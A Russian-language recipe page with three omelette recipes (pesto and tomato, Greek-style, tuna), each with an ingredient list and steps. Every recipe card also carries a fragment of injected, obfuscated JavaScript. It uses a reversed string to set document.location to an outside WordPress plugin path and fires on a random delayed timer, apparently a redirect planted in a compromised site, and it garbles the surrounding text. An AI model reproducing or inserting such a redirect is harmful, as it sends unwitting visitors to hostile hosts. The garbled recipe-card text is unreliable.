Бекон, фасоль, колбаса — всё это в прошлом. Мы расскажем, как приготовить омлет в итальянском и греческом стиле. Поверьте, после того, как вы попробуете эти блюда, вы захотите завтракать только ими. А, может, даже и обедать.
Омлет с соусом песто и помидорами
Песто — наш самый любимый итальянский соус. А лучше всего он сочетается именно с помидорами. Как вы понимаете, не попробовать такой омлет никак нельзя.
Фото: edibleperspective.com
3 крутых, необычных, но простых рецепта омлета
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
2
КАЛОРИЙНОСТЬ:
321 ккал
321 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Яйца
4 шт.
Помидоры черри
10—15 штук
Песто
2—3 ст. л.
Оливковое масло
1 ст. л.
Соль
по вкусу
Чёрный молотый перец
по вкусу
- Сделайте песто по нашему рецепту.
- Вымойте черри и разрежьте их на половинки. Разогрейте чайную ложку оливкового масла в сковороде. Как только масло нагреется, положите туда помидоры. Готовьте их около 12—18 минут, пока вся жидкость из них не испарится — должно казаться, что они карамелизировались. Переложите черри в тарелку.
- Уменьшите огонь. Добавьте оставшееся масло. Взбивайте яйца в течение 30 секунд, затем вылейте яичную массу в сковороду и равномерно по ней распределите — представьте, что жарите блины. Оставьте яйца на две минуты. Затем накройте крышкой и ещё немного уменьшите огонь. Готовьте около 2—4 минут.
- Положите столовую ложку песто и половину помидоров на одну сторону омлета. Накройте начинку второй стороной. Оставьте омлет на сковороде ещё на одну минуту, затем разрежьте пополам и подавайте. Омлет можно посолить и поперчить сверху по желанию.
Омлет по-гречески
Греческий салат в вашем омлете.
Фото: unislim.com
3 крутых, необычных, но простых рецепта омлета
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
371
371 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Яйца
10 штук
Рубленая петрушка
горсть
Помидоры черри
15—20 штук
Маслины без косточек
10—15 штук
Красный лук
1 шт.
Оливковое масло
2 ст. л.
Фета
100 г
- Разогрейте масло в сковороде. Взбейте яйца с петрушкой, перцем и солью.
- Нарежьте красный лук полукольцами, переложите его на сковороду в уже разогретое масло и готовьте до чуть золотистого цвета — около четырёх минут.
- Добавьте в сковороду разрезанные пополам помидоры, маслины и готовьте одну—две минуты, пока помидоры не станут мягкими.
- Убавьте огонь до среднего. Перелейте яичную смесь в сковороду, помешивайте в течение двух минут. Затем посыпьте фетой и поставьте сковороду в духовку на 5—6 минут, пока омлет не покроется небольшой золотистой корочкой.
- Достаньте из духовки, разрежьте на кусочки и сразу подавайте.
Омлет с тунцом
Наверняка многие из вас не раз ели сендвич с тунцом и очень его любят. В этом рецепте всё то же самое, только вместо хлеба — омлет. Нам кажется, что такой вариант гораздо лучше, сытнее и полезнее. А ещё им вполне можно заменить обед. Ведь здесь содержится 37 граммов белка.
Фото: theironyou.com
3 крутых, необычных, но простых рецепта омлета
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
410
410 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Консервированный тунец в собственном соку
300 г
Домашний майонез
¼ чашки
Рубленая головка лука
2 ст. л.
Мелко нарезанный сельдерей
1 ст. л.
Мелко нарезанная петрушка
1 ч. л.
Каперсы
1 ч. л.
Лимонный сок
по вкусу
Яйца
6 штук большого размера
Молоко
60 мл
Оливковое масло
2 ст. л.
Морская соль
¼ ч. л.
Чёрный молотый перец
щепотка
Натёртый сыр (чеддер или любой другой полутвёрдый сыр)
½ чашки
- Приготовьте майонез по нашему рецепту.
- Смешайте тунец, лук, сельдерей, петрушку, каперсы, майонез и лимонный сок в одной миске. Отставьте миску в сторону.
- Взбейте яйца с молоком. Добавьте соль, перец и взбейте ещё раз.
- Разогрейте столовую ложку масла в сковороде на среднем огне. Вылейте половину яичной смеси и распределите её тонким слоем по сковороде (вспомните про блины).
- Пока яйца схватываются, посыпьте их половиной порции сыра. Когда омлет приготовится, аккуратно сдвиньте его лопаткой на тарелку. Сразу же положите на одну сторону омлета начинку из тунца и накройте её второй стороной.
- Сделайте всё то же самое с оставшейся яичной смесью и начинкой. 1/2 каждого омлета — одна порция.